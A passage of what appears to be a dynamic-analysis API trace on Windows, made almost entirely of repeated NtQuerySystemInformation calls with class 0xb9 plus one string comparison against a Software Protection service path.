(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0287.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0c0, Length=0x28, ResultLength=0x0) [0287.039] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0287.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0287.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0287.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0287.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0287.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea0, Length=0x28, ResultLength=0x0) [0287.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea0, Length=0x28, ResultLength=0x0) [0287.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea0, Length=0x28, ResultLength=0x0) [0287.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf10, Length=0x28, ResultLength=0x0) [0287.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0287.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf90, Length=0x28, ResultLength=0x0) [0287.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf90, Length=0x28, ResultLength=0x0) [0287.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0287.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x20, ResultLength=0x0) [0287.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x20, ResultLength=0x0) [0287.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x20, ResultLength=0x0) [0287.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x20, ResultLength=0x0) [0287.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0287.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x20, ResultLength=0x0) [0287.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce80, Length=0x20, ResultLength=0x0) [0287.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce80, Length=0x20, ResultLength=0x0) [0287.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd70, Length=0x50, ResultLength=0x0) [0287.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd70, Length=0x50, ResultLength=0x0) [0287.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd70, Length=0x50, ResultLength=0x0) [0287.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x50, ResultLength=0x0) [0287.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x50, ResultLength=0x0) [0287.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x50, ResultLength=0x0) [0287.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x50, ResultLength=0x0) [0287.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x38, ResultLength=0x0) [0287.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x28, ResultLength=0x0) [0287.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x28, ResultLength=0x0) [0287.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x28, ResultLength=0x0) [0287.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x28, ResultLength=0x0) [0287.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0287.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x38, ResultLength=0x0) [0287.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x28, ResultLength=0x0) [0287.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x28, ResultLength=0x0) [0287.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c950, Length=0x20, ResultLength=0x0) [0287.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8d0, Length=0x20, ResultLength=0x0) [0287.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8d0, Length=0x20, ResultLength=0x0) [0287.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8d0, Length=0x20, ResultLength=0x0) [0287.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x38, ResultLength=0x0) [0287.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x38, ResultLength=0x0) [0287.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x20, ResultLength=0x0) [0287.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9a0, Length=0x20, ResultLength=0x0) [0287.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9a0, Length=0x20, ResultLength=0x0) [0287.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x50, ResultLength=0x0) [0287.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x50, ResultLength=0x0) [0287.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x50, ResultLength=0x0) [0287.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x50, ResultLength=0x0) [0287.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x50, ResultLength=0x0) [0287.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x50, ResultLength=0x0) [0287.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x50, ResultLength=0x0) [0287.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0287.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0287.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0287.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0287.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0287.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0287.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0287.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0287.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0287.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0287.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0287.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0287.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0287.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0287.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0287.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0287.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0287.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x50, ResultLength=0x0) [0287.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x50, ResultLength=0x0) [0287.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x50, ResultLength=0x0) [0287.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x50, ResultLength=0x0) [0287.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x50, ResultLength=0x0) [0287.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x50, ResultLength=0x0) [0287.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x50, ResultLength=0x0) [0287.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0287.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0287.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0287.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0287.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0287.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0287.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0287.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0287.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0287.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0287.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0287.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0287.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0287.095] 